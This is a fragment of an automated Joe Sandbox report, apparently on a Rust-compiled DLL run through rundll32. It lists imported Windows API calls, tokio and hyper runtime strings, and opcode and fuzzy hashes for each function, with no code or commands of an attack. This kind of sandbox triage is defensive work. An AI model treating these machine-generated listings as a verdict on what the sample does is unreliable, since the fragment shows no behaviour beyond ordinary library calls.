                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: __aulldiv$PerformanceQuery$AddressCounterFrequencySingleWakememmove
                        • String ID: Map must not be polled after it returned `Poll::Ready`$bdp enabled implies bytes$called `Result::unwrap()` on an `Err` value$internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs$pong received implies ping_sent_at
                        • API String ID: 1828637350-3761593303
                        • Opcode ID: 1638af9d58b48404c957924f467180b6f947adbe8198a3b4b41492e3de50a343
                        • Instruction ID: f03e3773dcb503681f65acc4ca36b007b6b2b380e37d89aa8d9f7db94b4a4d4c
                        • Opcode Fuzzy Hash: 1638af9d58b48404c957924f467180b6f947adbe8198a3b4b41492e3de50a343
                        • Instruction Fuzzy Hash: AA42B230609B869FC71ACF74C49079AF7B1FF85348F008A1DE4A95B751DB31A95ACB82
                        APIs
                        • IsProcessorFeaturePresent.KERNEL32(00000017,00000001), ref: 6CC016EF
                        • memset.VCRUNTIME140(?,00000000,00000003), ref: 6CC01715
                        • memset.VCRUNTIME140(?,00000000,00000050), ref: 6CC0179F
                        • IsDebuggerPresent.KERNEL32 ref: 6CC017BB
                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CC017D4
                        • UnhandledExceptionFilter.KERNEL32(?), ref: 6CC017DE
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
                        • String ID:
                        • API String ID: 1045392073-0
                        • Opcode ID: 8a269c96bcd4ae6ed9a31a618c256806d5c430bd9166b2d5f0aaec5fa96ab714
                        • Instruction ID: 7630921f78e394f9f233fc1e056cdbcfde9a2bed9f6e68d1695156e06624f082
                        • Opcode Fuzzy Hash: 8a269c96bcd4ae6ed9a31a618c256806d5c430bd9166b2d5f0aaec5fa96ab714
                        • Instruction Fuzzy Hash: 0C31DB75E052289BDF11DF69C9497CDBBF8AF08348F1041DAE40DAB250EB719A85CF45
                        Strings
                        • pool is disabledBadScheme, xrefs: 6CBA34FB
                        • assertion failed: Pin::new(&mut rx).poll(cx).is_pending(), xrefs: 6CBA38DC
                        • request has been canceled, xrefs: 6CBA2D85
                        • called `Result::unwrap()` on an `Err` value, xrefs: 6CBA38B6
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID:
                        • String ID: assertion failed: Pin::new(&mut rx).poll(cx).is_pending()$called `Result::unwrap()` on an `Err` value$pool is disabledBadScheme$request has been canceled
                        • API String ID: 0-3394898113
                        • Opcode ID: 8dc2c8dc086eae19be723bc54290d67032402586e14e2d011bb5e06463b1e88c
                        • Instruction ID: 6121cd823596b8fb5e84c6a9fdcb56140938bd5c3df33e23a84218c310d067d2
                        • Opcode Fuzzy Hash: 8dc2c8dc086eae19be723bc54290d67032402586e14e2d011bb5e06463b1e88c
                        • Instruction Fuzzy Hash: 59723735909B818FC725CF69C48069AB7F1FFCA344F148A1EE8C95B651EB31D986CB42
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove$__aulldiv
                        • String ID:
                        • API String ID: 3540790784-0
                        • Opcode ID: 554521f18d188c2fe52e9b28331c6878334f267036f1e889e47ca4db2c462daa
                        • Instruction ID: a166bf9f22a44bded8bc1096f58fc5b18e582b8a15455b76c17e38a48a32fe37
                        • Opcode Fuzzy Hash: 554521f18d188c2fe52e9b28331c6878334f267036f1e889e47ca4db2c462daa
                        • Instruction Fuzzy Hash: 8A329C366083559FC714CF58C880A5EB7E2EFC9314F598A2EE89597395E731EC05CB82
                        APIs
                        • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000,?,?,00000001,?,6CBD9DB2), ref: 6CBF9C14
                        • GetLastError.KERNEL32(?,00000001,?,6CBD9DB2), ref: 6CBF9D84
                          • Part of subcall function 6CB65AD0: RtlFreeHeap.NTDLL(00000000,?,6CBE7E44), ref: 6CB65AE1
                        • memmove.VCRUNTIME140(?,?,00000200), ref: 6CBF9EEC
                        • memmove.VCRUNTIME140(?,?,00000200), ref: 6CBF9F0F
                        • memmove.VCRUNTIME140(00000000,?,00000C60,?,?,00000001,?,6CBD9DB2), ref: 6CBF9F52
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove$CompletionCreateErrorFreeHeapLastPort
                        • String ID:
                        • API String ID: 1220240363-0
                        • Opcode ID: 292f82b729f0733a2dbe0ff5f5c6e80a90fef5ac2715693e27e98d229eb5f1be
                        • Instruction ID: 4a94197d3468d726c13774deb5e702b280d014843a017f99ab793847042e0d21
                        • Opcode Fuzzy Hash: 292f82b729f0733a2dbe0ff5f5c6e80a90fef5ac2715693e27e98d229eb5f1be
                        • Instruction Fuzzy Hash: 3AF169B1A08B508FD324CF29C44075BB7E1FF89714F108A2EE5999B791DB71E849CB86
                        APIs
                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,6CBE859F,?,00001000,?,?,6CBE8025,?,6CBE859F,?,?), ref: 6CBE87F9
                        • WriteConsoleW.KERNEL32(?,?,00000000,00000000,00000000,?,6CBE859F), ref: 6CBE8829
                        • WriteConsoleW.KERNEL32(?,?,00000001,6CBE859F,00000000,?,6CBE859F), ref: 6CBE887A
                        • GetLastError.KERNEL32(?,6CBE859F), ref: 6CBE8AA3
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: ConsoleWrite$ByteCharErrorLastMultiWide
                        • String ID:
                        • API String ID: 3036337926-0
                        • Opcode ID: ff478ff939de7895b4797555e1b08ae5d8fde7a0a9ccde48b0145a38165974ec
                        • Instruction ID: 1c3d076be2e6a33b3ac155ce32aea73ab3723181eae7a2950f47ca385de79808
                        • Opcode Fuzzy Hash: ff478ff939de7895b4797555e1b08ae5d8fde7a0a9ccde48b0145a38165974ec
                        • Instruction Fuzzy Hash: 5BA14830A24B919AE7028F7CC44176AB774EFDA788F14D72EF98472D81FB7285858345
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID:
                        • String ID: \u$\u${${$}$}
                        • API String ID: 0-582841131
                        • Opcode ID: 55684a1cd47d026867eea2edf5f39cf33031e2aa0d0d6276a0e3687a2d03d039
                        • Instruction ID: d20dcfd5680c04ceb73563c32fc721dee422ab4aec1bb1faf6c12f3787ac9338
                        • Opcode Fuzzy Hash: 55684a1cd47d026867eea2edf5f39cf33031e2aa0d0d6276a0e3687a2d03d039
                        • Instruction Fuzzy Hash: 24515B23D09BDA86C7018B6984102DEFFF29FE6214F1D81DAD4D81F782C33A4696D3A5
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID:
                        • String ID: \u$\u${${$}$}
                        • API String ID: 0-582841131
                        • Opcode ID: 0773837b7737a32c24d7a6dbf0c427d4ad29ffe518d3294d2171eb1389707c93
                        • Instruction ID: 1f0ec0dc401952b6dd7cf741c806115660134a1d83547600f252642e8723c5db
                        • Opcode Fuzzy Hash: 0773837b7737a32c24d7a6dbf0c427d4ad29ffe518d3294d2171eb1389707c93
                        • Instruction Fuzzy Hash: E1415B63D097CA86C7018B7984212EEBFF25FDA214F2D81DAC4D81F382C3398596D3A5
                        APIs
                        • GetSystemTimeAsFileTime.KERNEL32(00000001), ref: 6CC0131E
                        • GetCurrentThreadId.KERNEL32 ref: 6CC0132D
                        • GetCurrentProcessId.KERNEL32 ref: 6CC01336
                        • QueryPerformanceCounter.KERNEL32(?), ref: 6CC01343
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                        • String ID:
                        • API String ID: 2933794660-0
                        • Opcode ID: 0b6676d97ee8b7ca0376cdbabb985b2c9925697878eeb3db7fec28f17fa8fcac
                        • Instruction ID: 7f2dcbd6a8dec22eace8ef1e8dcfe1a5d0763927f83f17676734116e0715164f
                        • Opcode Fuzzy Hash: 0b6676d97ee8b7ca0376cdbabb985b2c9925697878eeb3db7fec28f17fa8fcac
                        • Instruction Fuzzy Hash: 74F06274E5060DEBCF00DFB4C58999EBBF4FF1D204B928599A812E7101E735AB85DB50
                        APIs
                          • Part of subcall function 6CBEFDD0: QueryPerformanceCounter.KERNEL32 ref: 6CBEFE15
                          • Part of subcall function 6CBEFDD0: QueryPerformanceFrequency.KERNEL32 ref: 6CBEFE5C
                          • Part of subcall function 6CBEFDD0: __aulldiv.LIBCMT ref: 6CBEFE97
                          • Part of subcall function 6CBEFDD0: __aulldiv.LIBCMT ref: 6CBEFEF2
                          • Part of subcall function 6CBEFDD0: __aulldiv.LIBCMT ref: 6CBEFF07
                        • __aulldiv.LIBCMT ref: 6CBA5FED
                        Strings
                        • too much time has elapsed since the interval was supposed to tick, xrefs: 6CBA60E8
                        • overflow when subtracting duration from instant, xrefs: 6CBA60D6
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: __aulldiv$PerformanceQuery$CounterFrequency
                        • String ID: overflow when subtracting duration from instant$too much time has elapsed since the interval was supposed to tick
                        • API String ID: 2403592835-2340278003
                        • Opcode ID: a102e6c4e86cff3c36b9da4c17f02aa3ec6d5c5c57ef850914ed051e206d645a
                        • Instruction ID: 8f990ce5bf97b2a45aea88d7018b80e2401ff67bd325ad895b88c01a29890f53
                        • Opcode Fuzzy Hash: a102e6c4e86cff3c36b9da4c17f02aa3ec6d5c5c57ef850914ed051e206d645a
                        • Instruction Fuzzy Hash: 07622772A083808FD318CF69C89075AFBE2EFC8314F158A2EE5D997750D77598458B82
                        APIs
                          • Part of subcall function 6CBD9B05: memset.VCRUNTIME140(00000000,00000000,?,?,?,?,6CBD985C), ref: 6CBD9B28
                        • DecryptMessage.SECUR32(?,?,00000000,00000000), ref: 6CBD9955
                          • Part of subcall function 6CB8885A: memmove.VCRUNTIME140(?,?,?,?,?,?,6CB8C2F6,?,?,6CBD460C,?,6CBD463F), ref: 6CB88883
                          • Part of subcall function 6CBE6438: memmove.VCRUNTIME140(?,?,?,?,6CBD5878,?,?,?,?,6CBD55AB), ref: 6CBE64C5
                        Strings
                        • assertion failed: pos <= self.dec_in.get_ref().len() as u64, xrefs: 6CBD9AF6
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove$DecryptMessagememset
                        • String ID: assertion failed: pos <= self.dec_in.get_ref().len() as u64
                        • API String ID: 522839164-2093299206
                        • Opcode ID: aad079ba67e63a99c08fd7309906d5446f9eb6f85b495d773c5806e14180a8c0
                        • Instruction ID: 3ef2dd29d57192efc8dc993bfce490423935ec3c997850eeccbed038ded10383
                        • Opcode Fuzzy Hash: aad079ba67e63a99c08fd7309906d5446f9eb6f85b495d773c5806e14180a8c0
                        • Instruction Fuzzy Hash: 26919C71A087809FD314DF6AC490B5BB7E1EF89318F11892DE59987B50EB71F889CB42
                        APIs
                        • memmove.VCRUNTIME140(?,00000000,00000094), ref: 6CB8EF43
                        • memmove.VCRUNTIME140(?,?,00000094), ref: 6CB8EF6A
                        Strings
                        • internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs, xrefs: 6CB902B6
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID: internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs
                        • API String ID: 2162964266-2861346101
                        • Opcode ID: c8f1898e59e2a60ccb97ca19652e5bc4873b984f872adab7a91e0c48bc7a982d
                        • Instruction ID: 1797a0e9cb8ade2b048628232e6ac1372af48d8462b15544105a4f7d044f34e4
                        • Opcode Fuzzy Hash: c8f1898e59e2a60ccb97ca19652e5bc4873b984f872adab7a91e0c48bc7a982d
                        • Instruction Fuzzy Hash: 5B824A75A0A3818FD724CF18C480BDEB7E5EFD9314F148A2EE89897750D774A985CB82
                        APIs
                        • __aulldiv.LIBCMT ref: 6CB9257B
                        • memmove.VCRUNTIME140(?,?,?), ref: 6CB92890
                        • memmove.VCRUNTIME140(?,?,?,00000000,?,00000000), ref: 6CB928F4
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove$__aulldiv
                        • String ID:
                        • API String ID: 3540790784-0
                        • Opcode ID: 72667a2dfde476c3bd957ccb183ae154f6491e5475994a5f3ca1d1de94f3ee59
                        • Instruction ID: 66117a2ce3bac322f33e6fac64ab95d169a6fc049fd335b0114e7c77db855405
                        • Opcode Fuzzy Hash: 72667a2dfde476c3bd957ccb183ae154f6491e5475994a5f3ca1d1de94f3ee59
                        • Instruction Fuzzy Hash: F7D1C232A083419FD724DF28C8946AEB7E2EFCA314F55893DE48997750DA30EC458B87
                        Strings
                        • internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs, xrefs: 6CBC4EF7
                        • mut const ; dyn + unsafe extern ", xrefs: 6CBC4788
                        • :, xrefs: 6CBC4BCA
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID: mut const ; dyn + unsafe extern "$:$internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs
                        • API String ID: 2162964266-1873620769
                        • Opcode ID: c368a78c8de836dc8b7686bbca57aed14968bd876312154c6ef23c936865e35b
                        • Instruction ID: b7924b06b6e41ec44826668b3582d4f46bfe141c27270a087ea289205833e5d4
                        • Opcode Fuzzy Hash: c368a78c8de836dc8b7686bbca57aed14968bd876312154c6ef23c936865e35b
                        • Instruction Fuzzy Hash: 06326A716083919FD714CF28C490B6ABBE1AFC8314F25891DE8999BB51DB70E946CF82
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e0f54cc63aa671a2c19d3f5b708820c9f8b679801bc9413d1a089d0fea8dc457
                        • Instruction ID: 07a288c900780c7052f4dc8e2fc58b34a0bd1bb8053b0730633adc98691c4f54
                        • Opcode Fuzzy Hash: e0f54cc63aa671a2c19d3f5b708820c9f8b679801bc9413d1a089d0fea8dc457
                        • Instruction Fuzzy Hash: 69E1E273F19B144BE308CA59CC9131EB6D2EBD8350F0A8A3DE59AD3381DAB8CD058785
                        APIs
                          • Part of subcall function 6CBD9B05: memset.VCRUNTIME140(00000000,00000000,?,?,?,?,6CBD985C), ref: 6CBD9B28
                        • DecryptMessage.SECUR32(?,?,00000000,00000000), ref: 6CBB0450
                          • Part of subcall function 6CB8885A: memmove.VCRUNTIME140(?,?,?,?,?,?,6CB8C2F6,?,?,6CBD460C,?,6CBD463F), ref: 6CB88883
                          • Part of subcall function 6CBE6438: memmove.VCRUNTIME140(?,?,?,?,6CBD5878,?,?,?,?,6CBD55AB), ref: 6CBE64C5
                        Strings
                        • assertion failed: pos <= self.dec_in.get_ref().len() as u64, xrefs: 6CBB063E
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove$DecryptMessagememset
                        • String ID: assertion failed: pos <= self.dec_in.get_ref().len() as u64
                        • API String ID: 522839164-2093299206
                        • Opcode ID: 340b110976178622a33546d05753072048ba7d4cc164eb4d8d979b6d8a0b5d3e
                        • Instruction ID: 835561341fd7caaeb261a505b00bb322543f460fdc754140744096372865feb9
                        • Opcode Fuzzy Hash: 340b110976178622a33546d05753072048ba7d4cc164eb4d8d979b6d8a0b5d3e
                        • Instruction Fuzzy Hash: 00918F706087819FD704CF25D5807AAF7E1FF88318F108A2DE59997750DB75A898CB82
                        APIs
                        • __aulldiv.LIBCMT ref: 6CB96856
                          • Part of subcall function 6CBEFDD0: QueryPerformanceCounter.KERNEL32 ref: 6CBEFE15
                          • Part of subcall function 6CBEFDD0: QueryPerformanceFrequency.KERNEL32 ref: 6CBEFE5C
                          • Part of subcall function 6CBEFDD0: __aulldiv.LIBCMT ref: 6CBEFE97
                          • Part of subcall function 6CBEFDD0: __aulldiv.LIBCMT ref: 6CBEFEF2
                          • Part of subcall function 6CBEFDD0: __aulldiv.LIBCMT ref: 6CBEFF07
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: __aulldiv$PerformanceQuery$CounterFrequency
                        • String ID:
                        • API String ID: 2403592835-0
                        • Opcode ID: e26e4369e8f6aa481f17d170623347661f4d7e57bcff3c55c12f0e16bacdbae2
                        • Instruction ID: dea84d839e270f43f195af39a130e290baefc612abb7db2e71604c3eb663a620
                        • Opcode Fuzzy Hash: e26e4369e8f6aa481f17d170623347661f4d7e57bcff3c55c12f0e16bacdbae2
                        • Instruction Fuzzy Hash: FF127C716083419FC744CF28C890A5AB7E1FFCA358F19896DE889DB761E731E945CB82
                        APIs
                        • memset.VCRUNTIME140(?,00000000,00000200), ref: 6CBE107E
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memset
                        • String ID: punycode{-0
                        • API String ID: 2221118986-3751456247
                        • Opcode ID: 82fc0ead2f22d984517de182c04bb2cc8d13507f300b3f9a7e60c15e08a90b26
                        • Instruction ID: 5bbca0e0c22a6f80ea4965006eabe4ff934d7b7c75e8d25b031f9d708b663073
                        • Opcode Fuzzy Hash: 82fc0ead2f22d984517de182c04bb2cc8d13507f300b3f9a7e60c15e08a90b26
                        • Instruction Fuzzy Hash: D6D11471E012598BDF04CF98D8907EDB7B2FF4C754F284229D825B7B82D73499458B92
                        Strings
                        • called `Result::unwrap()` on an `Err` value, xrefs: 6CBA6C9D, 6CBA6CDD
                        • Map must not be polled after it returned `Poll::Ready`, xrefs: 6CBA6C71
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
